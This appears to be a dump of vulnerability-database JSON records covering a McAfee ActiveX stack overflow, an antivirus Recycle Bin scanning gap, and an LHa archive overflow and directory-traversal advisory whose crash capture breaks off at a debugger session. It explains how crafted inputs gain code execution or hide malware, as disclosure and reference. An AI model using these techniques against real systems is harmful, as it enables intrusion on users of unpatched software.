"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in McSubMgr ActiveX control (mcsubmgr.dll) in McAfee Security Center 6.0.23 for Internet Security Suite 2006, Wireless Home Network Security, Personal Firewall Plus, VirusScan, Privacy Service, SpamKiller, AntiSpyware, and QuickClean allows remote user-assisted attackers to execute arbitrary commands via long string parameters, which are later used in vsprintf. McAfee SecurityCenter is prone to a stack-based buffer-overflow vulnerability. This vulnerability requires a certain amount of user-interaction for an attack to occur, such as visiting a malicious website. A successful exploit would let a remote attacker execute code with the privileges of the currently logged in user. \nThis issue is reported to affect versions 4.3 through 6.0.22. Please see the affected packages section for a list of McAfee consumer products that ship with vulnerable versions of the McAfee SecurityCenter. McAfee Subscription Manager (McAfee Subscription Manager) is a component released together with many McAfee products to manage product permissions. It is an ActiveX control, through which manufacturers can check the legality of product use. McSubMgr.dll, the implementation module of the product inspection manager, does not check the length of the incoming parameters. Remote attackers can lure users to visit malicious websites, and transmit data exceeding 3000 bytes to McSubMgr.dll in web scripts, resulting in stack overflow. to execute arbitrary commands. Link: http://www.securityfocus.com/archive/1/442495/30/0/threaded. \n\n----------------------------------------------------------------------\n\nHardcore Disassembler / Reverse Engineer Wanted!\n\nWant to work with IDA and BinDiff?\nWant to write PoC\u0027s and Exploits?\n\nYour nationality is not important. \nWe will get you a work permit, find an apartment, and offer a\nrelocation compensation package. \n\nThe vulnerability is caused due to an unspecified error and allows\nexecution of arbitrary code. No more information is currently\navailable. \n\nSOLUTION:\nSufficient information about the vulnerability is not available to\nsuggest a proper workaround. \n\nPROVIDED AND/OR DISCOVERED BY:\neEye Digital Security\n\nORIGINAL ADVISORY:\neEye Digital Security:\nhttp://www.eeye.com/html/research/upcoming/20060719.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-3961"
},
{
"db": "CERT/CC",
"id": "VU#481212"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-001904"
},
{
"db": "BID",
"id": "19265"
},
{
"db": "VULHUB",
"id": "VHN-20069"
},
{
"db": "PACKETSTORM",
"id": "48724"
}
],
"trust": 2.79
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-20069",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-20069"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#481212",
"trust": 3.3
},
{
"db": "BID",
"id": "19265",
"trust": 2.8
},
{
"db": "NVD",
"id": "CVE-2006-3961",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "21264",
"trust": 2.6
},
{
"db": "SECTRACK",
"id": "1016614",
"trust": 2.5
},
{
"db": "OSVDB",
"id": "27698",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2006-3096",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2006-001904",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200608-011",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20060807 [EEYEB-20060719] MCAFEE SUBSCRIPTION MANAGER STACK BUFFER OVERFLOW",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "82987",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-71024",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "16510",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-20069",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "48724",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#481212"
},
{
"db": "VULHUB",
"id": "VHN-20069"
},
{
"db": "BID",
"id": "19265"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-001904"
},
{
"db": "PACKETSTORM",
"id": "48724"
},
{
"db": "CNNVD",
"id": "CNNVD-200608-011"
},
{
"db": "NVD",
"id": "CVE-2006-3961"
}
]
},
"id": "VAR-200608-0456",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-20069"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:28:30.230000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://service.mcafee.com/default.aspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-001904"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-20069"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-001904"
},
{
"db": "NVD",
"id": "CVE-2006-3961"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://ts.mcafeehelp.com/faq3.asp?docid=407052"
},
{
"trust": 2.5,
"url": "http://www.eeye.com/html/research/advisories/ad2006807.html"
},
{
"trust": 2.5,
"url": "http://www.kb.cert.org/vuls/id/481212"
},
{
"trust": 2.1,
"url": "http://www.eeye.com/html/research/upcoming/20060719.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/19265"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/27698"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1016614"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/21264"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/442495/100/100/threaded"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2006/3096"
},
{
"trust": 0.8,
"url": "http://us.mcafee.com/root/product.asp?productid=msc"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/19265 "
},
{
"trust": 0.8,
"url": "http://securitytracker.com/id?1016614 "
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/21264 "
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3961"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-3961"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2006/3096"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/442495/100/100/threaded"
},
{
"trust": 0.3,
"url": "http://www.mcafee.com/"
},
{
"trust": 0.3,
"url": "/archive/1/442495"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/21264/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/6481/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/9052/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/11210/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/11211/"
},
{
"trust": 0.1,
"url": "http://secunia.com/hardcore_disassembler_and_reverse_engineer/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/6439/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/267/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7790/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#481212"
},
{
"db": "VULHUB",
"id": "VHN-20069"
},
{
"db": "BID",
"id": "19265"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-001904"
},
{
"db": "PACKETSTORM",
"id": "48724"
},
{
"db": "CNNVD",
"id": "CNNVD-200608-011"
},
{
"db": "NVD",
"id": "CVE-2006-3961"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#481212"
},
{
"db": "VULHUB",
"id": "VHN-20069"
},
{
"db": "BID",
"id": "19265"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-001904"
},
{
"db": "PACKETSTORM",
"id": "48724"
},
{
"db": "CNNVD",
"id": "CNNVD-200608-011"
},
{
"db": "NVD",
"id": "CVE-2006-3961"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-08-15T00:00:00",
"db": "CERT/CC",
"id": "VU#481212"
},
{
"date": "2006-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-20069"
},
{
"date": "2006-08-01T00:00:00",
"db": "BID",
"id": "19265"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-001904"
},
{
"date": "2006-08-02T08:14:26",
"db": "PACKETSTORM",
"id": "48724"
},
{
"date": "2006-08-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200608-011"
},
{
"date": "2006-08-01T21:04:00",
"db": "NVD",
"id": "CVE-2006-3961"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-10-03T00:00:00",
"db": "CERT/CC",
"id": "VU#481212"
},
{
"date": "2018-10-17T00:00:00",
"db": "VULHUB",
"id": "VHN-20069"
},
{
"date": "2007-07-03T19:18:00",
"db": "BID",
"id": "19265"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-001904"
},
{
"date": "2006-09-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200608-011"
},
{
"date": "2024-11-21T00:14:48.890000",
"db": "NVD",
"id": "CVE-2006-3961"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200608-011"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "McAfee Subscription Manager ActiveX control vulnerable to stack buffer overflow",
"sources": [
{
"db": "CERT/CC",
"id": "VU#481212"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200608-011"
}
],
"trust": 0.6
}
}
var-199912-0149
Vulnerability from variot
The default configurations for McAfee Virus Scan and Norton Anti-Virus virus checkers do not check files in the RECYCLED folder that is used by the Windows Recycle Bin utility, which allows attackers to store malicious code without detection. Many commercial virus scanners for Windows platforms exclude the Recycled folder on the hard drive from their scans. The Recycled folder is where Win9x operating systems keep files that have been deleted via the GUI but not purged from the Recycle Bin. Files of any nature can be manually placed in the Recycled folder. Therefore, it is possible for any user or program to put code into that folder that will never be subject to virus scans. Although WinNT makes use of a folder called 'Recycler' for similar purposes, many virus scanners for NT still have the 'Recycled' folder listed in the exclusions. Note that other virus scanners than those listed under the 'info' tab may be vulnerable as well. document
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-199912-0149",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "virusscan",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "norton antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "*"
},
{
"model": "norton antivirus",
"scope": null,
"trust": 0.6,
"vendor": "symantec",
"version": null
},
{
"model": "norton antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "2000"
},
{
"model": "associates virusscan for windows nt a",
"scope": "eq",
"trust": 0.3,
"vendor": "network",
"version": "4.0.3"
},
{
"model": "associates virusscan for windows nt",
"scope": "eq",
"trust": 0.3,
"vendor": "network",
"version": "4.0.2"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.0"
},
{
"model": "norton antivirus",
"scope": "ne",
"trust": 0.3,
"vendor": "symantec",
"version": "5.0"
},
{
"model": "norton antivirus for nt",
"scope": "ne",
"trust": 0.3,
"vendor": "symantec",
"version": "4.0"
},
{
"model": "inoculan for windows nt",
"scope": "ne",
"trust": 0.3,
"vendor": "cheyenne",
"version": "4.0"
}
],
"sources": [
{
"db": "BID",
"id": "956"
},
{
"db": "CNNVD",
"id": "CNNVD-199912-076"
},
{
"db": "NVD",
"id": "CVE-2000-0119"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Originally posted to NTBugtraq by Neil Bortnak.",
"sources": [
{
"db": "BID",
"id": "956"
},
{
"db": "CNNVD",
"id": "CNNVD-199912-076"
}
],
"trust": 0.9
},
"cve": "CVE-2000-0119",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2000-0119",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-1698",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2000-0119",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-199912-076",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-1698",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-1698"
},
{
"db": "CNNVD",
"id": "CNNVD-199912-076"
},
{
"db": "NVD",
"id": "CVE-2000-0119"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The default configurations for McAfee Virus Scan and Norton Anti-Virus virus checkers do not check files in the RECYCLED folder that is used by the Windows Recycle Bin utility, which allows attackers to store malicious code without detection. Many commercial virus scanners for Windows platforms exclude the Recycled folder on the hard drive from their scans. The Recycled folder is where Win9x operating systems keep files that have been deleted via the GUI but not purged from the Recycle Bin. Files of any nature can be manually placed in the Recycled folder. Therefore, it is possible for any user or program to put code into that folder that will never be subject to virus scans. \nAlthough WinNT makes use of a folder called \u0027Recycler\u0027 for similar purposes, many virus scanners for NT still have the \u0027Recycled\u0027 folder listed in the exclusions. \nNote that other virus scanners than those listed under the \u0027info\u0027 tab may be vulnerable as well. document",
"sources": [
{
"db": "NVD",
"id": "CVE-2000-0119"
},
{
"db": "BID",
"id": "956"
},
{
"db": "VULHUB",
"id": "VHN-1698"
}
],
"trust": 1.26
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-1698",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-1698"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2000-0119",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-199912-076",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20000130 BYPASS VIRUS CHECKING",
"trust": 0.6
},
{
"db": "BID",
"id": "956",
"trust": 0.4
},
{
"db": "SEEBUG",
"id": "SSVID-73649",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "19733",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-1698",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-1698"
},
{
"db": "BID",
"id": "956"
},
{
"db": "CNNVD",
"id": "CNNVD-199912-076"
},
{
"db": "NVD",
"id": "CVE-2000-0119"
}
]
},
"id": "VAR-199912-0149",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-1698"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-22T23:11:44.661000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2000-0119"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://marc.info/?l=bugtraq\u0026m=94936267131123\u0026w=2"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=94936267131123\u0026w=2"
},
{
"trust": 0.3,
"url": "http://www.securityfocus.com/templates/archive.pike?list=1\u0026date=2000-01-29\u0026thread=3895202f.a89c9f57@bortnak.com"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=94936267131123\u0026amp;w=2"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-1698"
},
{
"db": "BID",
"id": "956"
},
{
"db": "CNNVD",
"id": "CNNVD-199912-076"
},
{
"db": "NVD",
"id": "CVE-2000-0119"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-1698"
},
{
"db": "BID",
"id": "956"
},
{
"db": "CNNVD",
"id": "CNNVD-199912-076"
},
{
"db": "NVD",
"id": "CVE-2000-0119"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "1999-12-22T00:00:00",
"db": "VULHUB",
"id": "VHN-1698"
},
{
"date": "1999-12-22T00:00:00",
"db": "BID",
"id": "956"
},
{
"date": "1999-12-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-199912-076"
},
{
"date": "1999-12-22T05:00:00",
"db": "NVD",
"id": "CVE-2000-0119"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-18T00:00:00",
"db": "VULHUB",
"id": "VHN-1698"
},
{
"date": "2009-07-11T01:56:00",
"db": "BID",
"id": "956"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-199912-076"
},
{
"date": "2024-11-20T23:31:45.740000",
"db": "NVD",
"id": "CVE-2000-0119"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-199912-076"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Virus Scanning Recycle Bin Exclusions for Multiple Vendors",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-199912-076"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-199912-076"
}
],
"trust": 0.6
}
}
var-200408-0141
Vulnerability from variot
Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes ("//absolute/path"). The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. ------------------------------------------------------------------------
LHa buffer overflows and directory traversal problems
PROGRAM: LHa (Unix version) VENDOR: various people VULNERABLE VERSIONS: 1.14d to 1.14i 1.17 (Linux binary) possibly others IMMUNE VERSIONS: 1.14i with my patch applied 1.14h with my patch applied LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm http://www2m.biglobe.ne.jp/~dolphin/lha/prog/ LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ REFERENCES: CAN-2004-0234 (buffer overflows) CAN-2004-0235 (directory traversal)
- DESCRIPTION *
LHa is a console-based program for packing and unpacking LHarc archives.
It is one of the packages in Red Hat Linux, Fedora Core, SUSE Linux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux, Gentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. It is also included in the port/package collections for FreeBSD, OpenBSD and NetBSD.
- OVERVIEW *
LHa has two stack-based buffer overflows and two directory traversal problems. They can be abused by malicious people in many different ways: some mail virus scanners require LHa and run it automatically on attached files in e-mail messages. Some web applications allow uploading and unpacking of LHarc archives. Some people set up their web browsers to start LHa automatically after downloading an LHarc archive. Finally, social engineering is probably quite effective in this case.
- TECHNICAL DETAILS *
a) two stack-based buffer overflows
The buffer overflows in LHa occur when testing (t) or extracting (x) archives where the archive contents have too long filenames or directory names. The cause of the problem is the function get_header() in header.c. This function first reads the lengths of filenames or directory names from the archive, and then it reads that many bytes to a char array (one for filenames and one for directory names) without checking if the array is big enough.
By exploiting this bug, you get control over several registers including EIP, as you can see in this session capture:
$ lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ gdb lha GNU gdb Red Hat Linux (5.3post-0.20021129.18rh) Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. 